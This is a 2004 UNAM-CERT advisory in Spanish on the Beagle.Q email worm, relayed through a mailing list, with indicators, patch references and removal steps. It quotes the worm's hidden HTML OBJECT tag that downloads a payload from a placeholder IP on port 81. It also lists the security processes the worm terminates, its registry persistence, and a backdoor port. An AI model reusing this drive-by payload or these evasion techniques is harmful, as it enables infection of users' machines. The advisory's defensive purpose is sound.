[Previo por Fecha] [Siguiente por Fecha] [Previo por Hilo] [Siguiente por Hilo]
[Hilos de Discusión] [Fecha] [Tema] [Autor]-----BEGIN PGP SIGNED MESSAGE-----
--------------------------------------------------------------------
UNAM-CERT
Departamento de Seguridad en Computo
DGSCA- UNAM
Nota de Seguridad UNAM-CERT 2004-04
Propagación del Virus W32.Beagle.Q y Variantes
----------------------------------------------------------------------
En las últimas horas el CERT/UNAM-CERT ha recibido reportes de nuevo
gusano que se propaga de forma masiva a través del correo
electrónico. Este gusano conocido como Beagle.Q, explota una
vulnerabilidad reciente en el motor de Microsoft Internet Explorer
lo cual causa una infección sin la intervención del usuario y sin
incluir el ejecutable del virus en el mensaje de correo electrónico.
La vulnerabilidad explotada por Beagle.Q esta referenciada en el
BoletÃn de Seguridad de *Microsoft MS03-32, Cumulative Patch for
Internet Explorer (822925)
<http://www.microsoft.com/technet/security/bulletin/MS03-032.mspx>*
Fecha de Liberación: 18 de Marzo de 2004
Ultima Revisión: ---
Fuente: CERT/CC y diversos reportes de Equipos de
Respuesta a Incidentes, asà como Foros y
Listas de Discusión y reportes de
Usuarios.
SISTEMAS AFECTADOS
==================
* Windows 2000
* Windows 95
* Windows 98
* Windows Me
* Windows NT
* Windows 2000
* Windows XP
* Windows Server 2003
I. DESCRIPCIÃ?N
==============
Beagle.Q conocido también como W32.Bagle.Q [Computer Associates],
Bagle.Q [F-Secure], W32/Bagle.q@MM [McAfee], W32/Bagle.Q [Panda],
W32/Bagle-Q [Sophos], PE_Bagle.Q [Trend], W32.Beagle.O@mm [Symantec]
por los distintos distribuidores antivirus.
El gusano utiliza su propio motor SMTP para enviarse por sà mismo a
las direcciones de correo encontradas en el sistema. El gusano
contiene su propia rutina de codificación MIME y creará el correo en
memoria.
El correo tiene las siguientes caracterÃsticas:
* *Campo From* - Puede ser uno de los siguientes:
o management@<dominio del destinatario>
o administration@<dominio del destinatario>
o staff@<dominio del destinatario>
o antivirus@<dominio del destinatario>
o antispam@<dominio del destinatario>
o noreply@<dominio del destinatario>
o support@<dominio del destinatario>
* *Campo Subject* - Puede ser uno de los siguientes:
o Account notify
o E-mail account disabling warning.
o E-mail account security warning.
o E-mail technical support message.
o E-mail technical support warning.
o E-mail warning
o Email account utilization warning.
o Email report
o Encrypted document
o Fax Message Received
o Forum notify
o Hidden message
o Important notify
o Important notify about your e-mail account.
o Incoming message
o Notify about using the e-mail account.
o Notify about your e-mail account utilization.
o Notify from e-mail technical support.
o Protected message
o RE: Protected message
o RE: Text message
o Re: Document
o Re: Hello
o Re: Hi
o Re: Incoming Fax
o Re: Incoming Message
o Re: Msg reply
o Re: Thank you!
o Re: Thanks :)
o Re: Yahoo!
o Request response
o Site changes
o Warning about your e-mail account
* *Mensaje*
Un correo con el virus *Beagle.Q* tendrá la siguiente
apariencia en el cuerpo del mensaje:
<html><body>
<font face="System">
<OBJECT STYLE="display:none" DATA="http://<IP address>:81/373273.php">
</OBJECT></body></html>
Utilizando las aplicaciones de correo electrónico vulnerable
como por ejemplo Microsoft Outlook and Microsoft Outlook
Express, el virus/gusano es descargado vÃa HTTP desde la
dirección IP del campo DATA del mensaje HTML.
Cabe señalar que el cuerpo del correo es un mensaje en blanco,
pero contendrá código HTML semejante al antes mencionado, y
descargará y ejecutará automáticamente el gusano utilizando la
Vulnerabilidad en nternet Explorer descrita en el Boletin de
Seguridad de Microsoft MS03-032.
* Cumulative Patch for Internet Explorer (822925) *
http://www.microsoft.com/technet/security/bulletin/MS03-032.mspx
<http://www.microsoft.com/technet/security/bulletin/MS03-032.mspx>
El código intentará descargar el gusano de sistemas infectados
(direcciones IP).
El gusano inicia un servidor Web en el puerto 81 TCP. Actua
como servidor cuando recibe un requerimiento GET particular.
El gusano envia una página Web .hta conteniendo un script en
VBScript el cual descarga el ejecutable y ejecuta un archivo
llamado sm.exe. El método toma ventaja de la vulnerabilidad en
Internet Explorer anteriormente mencionada.
El gusano no enviará mensajes a las direcciones conteniendo
cualquiera de las siguientes cadenas:
o @avp.
o @foo
o @hotmail.com
o @iana
o @messagelab
o @microsoft
o @msn
o abuse
o admin
o anyone@
o bsd
o bugs@
o cafee
o certific
o contract@
o f-secur
o feste
o free-av
o gold-certs@
o google
o help@
o icrosoft
o info@
o kasp
o linux
o listserv
o local
o nobody@
o noone@
o noreply
o ntivi
o panda
o pgp
o postmaster@
o rating@
o root@
o samples
o sopho
o spam
o support
o unix
o winrar
o winzip
* Variantes del Gusano
======================
La versión W32.Beagle.R (Beagle.S y Beagle.T) busca acceder a los
sistemas por el puerto 81, a diferencia de su antecesesor
W32.Beagle.Q quien lo hace a través del puerto 2556, además, la
versión R intenta acceder o infectar a los equipos mediante la
búsqueda por IP?s de manera aleatoria y la versión Q lo hace
utilizando una dispersión mediante el envÃo de correos electrónicos
con ciertas caracterÃsticas como su anterior versión W32.Beagle.K.
De igual forma la versión R busca todos los archivos ejecutables en
el directorio c:\emails tratándolos de infectar.
*Detalles Técnicos*
1. Cuando se ejecuta Beagle.Q y el año del reloj del sistema es
2006 o posterior, el gusano intentará hacer los siguiente:
1. Elimina la llave:
HKEY_CURRENT_USER\SOFTWARE\windirects
2. Elimina el valor:
"direct.exe"="%System%\direct.exe"
de la clave del registro:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Si el valor esta presente, para que Beagle.Q no reinicie
cuando se inicie Windows.
3. Detiene su proceso.
2. Beagle.Q se copia a sà mismo en los siguientes archivos:
* %System%\directs.exe
* %System%\directs.exeopen
* %System%\directs.exeopenopen (Cualquier copia del gusano
o un archivo .zip o .rar protedigo con contraseña que
contiene el gusano.)
* %System%\directs.exeopenopenopen (Un archivo .bmp
conteniendo una imangen de la contraseña para el archivo
.zip o .rar.
*Nota: *%System% es una variable. El gusano localiza el
directorio de Sistema y se copia por sà mismo a esta
localidad. De forma predeterminada, esto es
C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32
(Windows NT/2000), o C:\Windows\System32 (Windows XP).
3. Agrega el valor:
"directs.exe"="%System%\directs.exee"
a la llave del registro:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
para que Beagle.Q se ejecute cuando inicie Windows.
4. Agrega la clave:
HKEY_CURRENT_USER\SOFTWARE\windirects
5. Finaliza los siguientes procesos, los cuales son responsables
de actualizar las firmas de varios programas antivirus:
* AGENTSVR.EXE
* ANTI-TROJAN.EXE
* ANTIVIRUS.EXE
* ANTS.EXE
* APIMONITOR.EXE
* APLICA32.EXE
* APVXDWIN.EXE
* ATCON.EXE
* ATGUARD.EXE
* ATRO55EN.EXE
* ATUPDATER.EXE
* ATWATCH.EXE
* AUPDATE.EXE
* AUTODOWN.EXE
* AUTOTRACE.EXE
* AUTOUPDATE.EXE
* AVCONSOL.EXE
* AVGSERV9.EXE
* AVLTMAIN.EXE
* AVPUPD.EXE
* AVSYNMGR.EXE
* AVWUPD32.EXE
* AVXQUAR.EXE
* AVprotect9x.exe
* Au.exe
* BD_PROFESSIONAL.EXE
* BIDEF.EXE
* BIDSERVER.EXE
* BIPCP.EXE
* BIPCPEVALSETUP.EXE
* BISP.EXE
* BLACKD.EXE
* BLACKICE.EXE
* BOOTWARN.EXE
* BORG2.EXE
* BS120.EXE
* CDP.EXE
* CFGWIZ.EXE
* CFIADMIN.EXE
* CFIAUDIT.EXE
* CFINET.EXE
* CFINET32.EXE
* CLEAN.EXE
* CLEANER.EXE
* CLEANER3.EXE
* CLEANPC.EXE
* CMGRDIAN.EXE
* CMON016.EXE
* CPD.EXE
* CPF9X206.EXE
* CPFNT206.EXE
* CV.EXE
* CWNB181.EXE
* CWNTDWMO.EXE
* D3dupdate.exe
* DEFWATCH.EXE
* DEPUTY.EXE
* DPF.EXE
* DPFSETUP.EXE
* DRWATSON.EXE
* DRWEBUPW.EXE
* ENT.EXE
* ESCANH95.EXE
* ESCANHNT.EXE
* ESCANV95.EXE
* EXANTIVIRUS-CNET.EXE
* FAST.EXE
* FIREWALL.EXE
* FLOWPROTECTOR.EXE
* FP-WIN_TRIAL.EXE
* FRW.EXE
* FSAV.EXE
* FSAV530STBYB.EXE
* FSAV530WTBYB.EXE
* FSAV95.EXE
* GBMENU.EXE
* GBPOLL.EXE
* GUARD.EXE
* GUARDDOG.EXE
* HACKTRACERSETUP.EXE
* HTLOG.EXE
* HWPE.EXE
* IAMAPP.EXE
* IAMSERV.EXE
* ICLOAD95.EXE
* ICLOADNT.EXE
* ICMON.EXE
* ICSSUPPNT.EXE
* ICSUPP95.EXE
* ICSUPPNT.EXE
* IFW2000.EXE
* IPARMOR.EXE
* IRIS.EXE
* JAMMER.EXE
* KAVLITE40ENG.EXE
* KAVPERS40ENG.EXE
* KERIO-PF-213-EN-WIN.EXE
* KERIO-WRL-421-EN-WIN.EXE
* KERIO-WRP-421-EN-WIN.EXE
* KILLPROCESSSETUP161.EXE
* LDPRO.EXE
* LOCALNET.EXE
* LOCKDOWN.EXE
* LOCKDOWN2000.EXE
* LSETUP.EXE
* LUALL.EXE
* LUCOMSERVER.EXE
* LUINIT.EXE
* MCAGENT.EXE
* MCUPDATE.EXE
* MFW2EN.EXE
* MFWENG3.02D30.EXE
* MGUI.EXE
* MINILOG.EXE
* MOOLIVE.EXE
* MRFLUX.EXE
* MSCONFIG.EXE
* MSINFO32.EXE
* MSSMMC32.EXE
* MU0311AD.EXE
* NAV80TRY.EXE
* NAVAPW32.EXE
* NAVDX.EXE
* NAVSTUB.EXE
* NAVW32.EXE
* NC2000.EXE
* NCINST4.EXE
* NDD32.EXE
* NEOMONITOR.EXE
* NETARMOR.EXE
* NETINFO.EXE
* NETMON.EXE
* NETSCANPRO.EXE
* NETSPYHUNTER-1.2.EXE
* NETSTAT.EXE
* NISSERV.EXE
* NISUM.EXE
* NMAIN.EXE
* NORTON_INTERNET_SECU_3.0_407.EXE
* NPF40_TW_98_NT_ME_2K.EXE
* NPFMESSENGER.EXE
* NPROTECT.EXE
* NSCHED32.EXE
* NTVDM.EXE
* NUPGRADE.EXE
* NVARCH16.EXE
* NWINST4.EXE
* NWTOOL16.EXE
* OSTRONET.EXE
* OUTPOST.EXE
* OUTPOSTINSTALL.EXE
* OUTPOSTPROINSTALL.EXE
* PADMIN.EXE
* PANIXK.EXE
* PAVPROXY.EXE
* PCC2002S902.EXE
* PCC2K_76_1436.EXE
* PCCIOMON.EXE
* PCDSETUP.EXE
* PCFWALLICON.EXE
* PCIP10117_0.EXE
* PDSETUP.EXE
* PERISCOPE.EXE
* PERSFW.EXE
* PF2.EXE
* PFWADMIN.EXE
* PINGSCAN.EXE
* PLATIN.EXE
* POPROXY.EXE
* POPSCAN.EXE
* PORTDETECTIVE.EXE
* PPINUPDT.EXE
* PPTBC.EXE
* PPVSTOP.EXE
* PROCEXPLORERV1.0.EXE
* PROPORT.EXE
* PROTECTX.EXE
* PSPF.EXE
* PURGE.EXE
* PVIEW95.EXE
* QCONSOLE.EXE
* QSERVER.EXE
* RAV8WIN32ENG.EXE
* REGEDIT.EXE
* REGEDT32.EXE
* RESCUE.EXE
* RESCUE32.EXE
* RRGUARD.EXE
* RSHELL.EXE
* RTVSCN95.EXE
* RULAUNCH.EXE
* SAFEWEB.EXE
* SBSERV.EXE
* SD.EXE
* SETUPVAMEEVAL.EXE
* SETUP_FLOWPROTECTOR_US.EXE
* SFC.EXE
* SGSSFW32.EXE
* SH.EXE
* SHELLSPYINSTALL.EXE
* SHN.EXE
* SMC.EXE
* SOFI.EXE
* SPF.EXE
* SPHINX.EXE
* SPYXX.EXE
* SS3EDIT.EXE
* ST2.EXE
* SUPFTRL.EXE
* SUPPORTER5.EXE
* SYMPROXYSVC.EXE
* SYSEDIT.EXE
* TASKMON.EXE
* TAUMON.EXE
* TAUSCAN.EXE
* TC.EXE
* TCA.EXE
* TCM.EXE
* TDS-3.EXE
* TDS2-98.EXE
* TDS2-NT.EXE
* TFAK5.EXE
* TGBOB.EXE
* TITANIN.EXE
* TITANINXP.EXE
* TRACERT.EXE
* TRJSCAN.EXE
* TRJSETUP.EXE
* TROJANTRAP3.EXE
* UNDOBOOT.EXE
* UPDATE.EXE
* VBCMSERV.EXE
* VBCONS.EXE
* VBUST.EXE
* VBWIN9X.EXE
* VBWINNTW.EXE
* VCSETUP.EXE
* VFSETUP.EXE
* VIRUSMDPERSONALFIREWALL.EXE
* VNLAN300.EXE
* VNPC3000.EXE
* VPC42.EXE
* VPFW30S.EXE
* VPTRAY.EXE
* VSCENU6.02D30.EXE
* VSECOMR.EXE
* VSHWIN32.EXE
* VSISETUP.EXE
* VSMAIN.EXE
* VSMON.EXE
* VSSTAT.EXE
* VSWIN9XE.EXE
* VSWINNTSE.EXE
* VSWINPERSE.EXE
* W32DSM89.EXE
* W9X.EXE
* WATCHDOG.EXE
* WEBSCANX.EXE
* WGFE95.EXE
* WHOSWATCHINGME.EXE
* WINRECON.EXE
* WNT.EXE
* WRADMIN.EXE
* WRCTRL.EXE
* WSBGATE.EXE
* WYVERNWORKSFIREWALL.EXE
* XPF202EN.EXE
* ZAPRO.EXE
* ZAPSETUP3001.EXE
* ZATUTOR.EXE
* ZAUINST.EXE
* ZONALM2601.EXE
* ZONEALARM.EXE
6. Borra los siguientes valores
* 9XHtProtect
* Antivirus
* HtProtect
* ICQ Net
* ICQNet
* My AV
* NetDy
* Special Firewall Service
* Tiny AV
* Zone Labs Client Ex
* service
De las claves del registro:
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
7. Abre una puerta trasera en el puerto 2556 TCP.
Si un intruso envÃa un mensaje de datos formateado
especialmente al puerto, el gusano permitirá que un archivo
arbitrario sea descargado en el directorio %windir%. Este
archivo será guardado como %Windir%\iuplda<x>.exe, donde <x>
es una cadena aleatoria de caracteres.
8. Intenta propagarse a través de redes de compartición de
archivos, como Kazaa e iMesh, W32.Beagle.K se copia a sà mismo
a los directorios que contienen la cadena "shar" en sus
nombres. El gusano utiliza los nombres de archivos de la
siguiente lista:
* ACDSee 9.exe
* Adobe Photoshop 9 full.exe
* Ahead Nero 7.exe
* Matrix 3 Revolution English Subtitles.exe
* Microsoft Office 2003 Crack, Working!.exe
* Microsoft Office XP working Crack, Keygen.exe
* Microsoft Windows XP, WinXP Crack, working Keygen.exe
* Opera 8 New!.exe
* Porno Screensaver.scr
* Porno pics arhive, xxx.exe
* Porno, sex, oral, anal cool, awesome!!.exe
* Serials.txt.exe
* WinAmp 5 Pro Keygen Crack Update.exe
* WinAmp 6 New!.exe
* Windown Longhorn Beta Leak.exe
* Windows Sourcecode update.doc.exe
* XXX hardcore images.exe
9. Busca en las unidades locales e intenta infectar archivos
.exe. La rutina de infección es polimórfica e agrega el gusano
al archivo.
10. Escanea los archivos en las unidades locales con las
siguientes extensiones:
* .adb
* .asp
* .cfg
* .cgi
* .dbx
* .dhtm
* .eml
* .htm
* .jsp
* .mbx
* .mdx
* .mht
* .mmf
* .msg
* .nch
* .ods
* .oft
* .php
* .pl
* .sht
* .shtm
* .stm
* .tbb
* .txt
* .uin
* .wab
* .wsh
* .xls
* .xml
y colecciona cualquier dirección de correo electrónico
que encuentra.
III. SOLUCIÃ?N
=============
* Aplicar una Actualización del Distribuidor
Se recomienda instalar la actualización de seguridad que
soluciona la vulnerabilidad que explota este gusano.
* Microsoft Security Bulletin MS03-032
Cumulative Patch for Internet Explorer (822925) *
http://www.microsoft.com/technet/security/bulletin/MS03-032.mspx
<http://www.microsoft.com/technet/security/bulletin/MS03-032.mspx>
Pero es recomendable aplicar la última actualización
acumulativa para Internet Explorer liberada el 2 de Febrero de
2004:
* Microsoft Security Bulletin MS04-004
Cumulative Security Update for Internet Explorer (832894)*
http://www.microsoft.com/technet/security/bulletin/MS04-004.mspx
<http://www.microsoft.com/technet/security/bulletin/MS04-004.mspx>
* Ejecutar, administrar y actualizar un software antivirus
Aunque un paquete de software antivirus actualizado no puede
brindar protección contra todos los códigos maliciosos, para
la mayorÃa de los usuarios representa la primera lÃnea de
defensa contra ataques de código malicioso.
La mayorÃa de los distribuidores antivirus liberan
frecuentemente información actualizada, herramientas, o bases
de datos de virus para ayudar a detectar y recuperar un
sistema que ha sido infectado mediante un código malicioso,
incluyendo Beagle.K. De esta forma, es importante que los
usuarios mantengan su software antivirus actualizado.
Mucho software antivirus se apoya en las actualizaciones
automáticas de las definiciones de virus. El CERT/UNAM-CERT
recomienda utilizar estas actualizaciones automáticas cuando
estén disponibles.
* No ejecutar programas de origen desconocido
Nunca descargue, instale o ejecute un programa a menos que
sepa que es autorizado por una persona o compañÃa en la que se
confÃa. Los usuarios de correo electrónico deben estar
concientes de archivos adjuntos inesperados, mientras que los
usuarios de Internet Relay Chat (IRC), de la mensajerÃa
instantánea (IM), y de servicios de compartición de archivos
deben ser muy cuidadosos al dar clic en vÃnculos o links
desconocidos o al ejecutar software enviado por otros usuarios
debido a que son los métodos más utilizados entre los intrusos
para intentar crear redes de agentes DDoS.
* Eliminación Manual
o Deshabilitar System Restore (Windows Me/XP).
+ Windows Me
1. Haga clic en Inicio, seleccione
Configuración y, a continuación, haga clic
en Panel de control.
2. Haga doble clic en Sistema. Se abrirá la
ventana de Propiedades del sistema.
*Nota:* Si no es visible el Ãcono de Sistema
haga clic en "Ver todas las opciones de
Panel de control".
3. Haga clic en la pestaña Rendimiento y haga
clic en el botón "Archivos de sistema". La
ventana de Archivos de sistema se abrirá.
4. Haga clic en Sistema de archivos y, a
continuación, haga clic en la pestaña
Solución de problemas.
5. Marque la casÃlla de la opción Deshabilitar
Restaurar sistema.
6. Haga clic en Aceptar y, por último, en
Cerrar. Haga clic en SÃ cuando se le
pregunte si desea reiniciar Windows.
+ Windows XP
1. Haga clic en Inicio.
2. Haga clic con el botón secundario en el
icono Mi PC y, a continuación, haga clic en
Propiedades.
3. Haga clic en la pestaña Restaurar sistema.
4. Marque la casÃlla Desactivar Restaurar
sistema o la casÃlla Desactivar Restaurar
sistema en todas las unidades.
5. Haga clic en Aplicar y a continuación, en
Aceptar.
6. Como verá en el mensaje, esta acción
eliminará todos los puntos de restauración
existentes. Haga clic en SÃ para llevar a
cabo esta acción.
7. Haga clic en Aceptar y reinice el sistema.
o Actualizar las definiciones de Antivirus.
Independientemente del software antivirus que este
utilizando, actualice su base de datos de firmas
antivirus para poder eliminar el virus Beagle.K.
o Eliminar los valores que fueron agregados al registro y
reiniciar el equipo.
1. Dar clic en Inicio y después en Ejecuta.
2. Escribir regedit y presionar Aceptar.
3. Buscar la siguiente llave:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
4. En el panel de la derecha eliminar el siguiente
valor:
"directs.exe"="%System%\directs.exe"
5. Salir del editor del registro.
6. Localizar y eliminar los archivos ejecutables
directs.exe, directs.exeopen, directs.exeopenopen
o directs.exeopenopenopen del directorio (en el
caso de que existan):
+ C:\Windows\System (Win 95/98/ME)
+ C:\Winnt\System32 (Win NT/2000)
+ C:\Windows\System32 (Win XP)
7. Reiniciar el equipo.
o Analizar el sistema mediante el software antivirus
actualizado para eliminar los archivos infectados.
APÃ?NDICE A. Referencias
=======================
* Virus y Gusanos UNAM-CERT -
http://www.unam-cert.unam.mx/gusanos/index.html
* Symantec -
http://securityresponse.symantec.com/avcenter/venc/data/w32 beagle o en mm html
* Trend Micro -
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=PE_BAGLE.Q
* Panda Software -
http://www.pandasoftware.com/virus_info/encyclopedia/overview.aspx?IdVirus=45705&sind=0
* Sophos http://www.sophos.com/virusinfo/analyses/w32bagleq.html
* Computer Associates -
http://www3.ca.com/threatinfo/virusinfo/virus.aspx?id=38599
------------------------------------------------------------------------
El *Departamento de Seguridad en Cómputo/UNAM-CERT* agradece el
apoyo en la elaboración, revisión y traducción de éste boletÃn a:
* Jesus Ramón Jiménez Rojas (jrojas en seguridad unam mx)
* Omar Landa Alfán (olanda en correo seguridad unam mx)
* Sergio Alavez (salavez en seguridad unam mx)
* Mauricio Andrade (mandrade en seguridad unam mx)
------------------------------------------------------------------------
INFORMACIÃ?N
===========
Este documento se encuentra disponible en:
http://www.seguridad.unam.mx
http://www.unam-cert.unam.mx/Notas/Notas2004/nota-UNAM-CERT-2004-004.html
Para mayor información acerca de éste boletÃn de seguridad contactar a:
UNAM CERT
Equipo de Respuesta a Incidentes UNAM
Departamento de Seguridad en Computo
DGSCA - UNAM
E-Mail : unam-cert en seguridad unam mx
http://www.unam-cert.unam.mx
http://www.seguridad.unam.mx
ftp://ftp.seguridad.unam.mx
Tel : 56 22 81 69
Fax : 56 22 80 43
- --
Juan Carlos Guel Lopez
UNAM-CERT
Equipo de Respuesta a Incidentes UNAM
DGSCA, UNAM E-mail: unam-cert en seguridad unam mx
Circuito Exterior, C. U. Tel.: 5622-81-69 Fax: 5622-80-43
Del. Coyoacan WWW: http://www.seguridad.unam.mx
04510 Mexico D. F. WWW: http://www.unam-cert.unam.mx
-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8
iQEVAwUBQFoUHnAvLUtwgRsVAQEPqgf/QAsUZJLmXlOKfS0I6lOONV+hWp11Ozw7
GO5BJbwbWMT/e3vkAybvaeZYUxft9lxugpZWzcs6gDlmtUceJqTbiGZ9Xvddg6yu
BYa4lJKUKlz1A5SrZgwDzixbePOU7YN2B3/qAKkJ0kbol2FqOkHrwQ3Nt9R89rUy
QRkZah/7UI1gduT2B7O1NYqRIeXhWvF8WVh74SpL3Ny6U8gKH/fDtYV8PIGxKT+x
i/2FUAhFL/r9TbYa+And5ZQGGppY/D+nFr729319PcyamO1N73dsoMPwAk4t7u8i
8blYZVBytyvyCWj9nNuBAbL7gXmEYsRTqKN55uWjWDoNK2M1SUF0AA==
=oCCx
-----END PGP SIGNATURE-----
Lista de correo linux en opensource org mx
Preguntas linux-owner en opensource org mx
http://www.opensource.org.mx/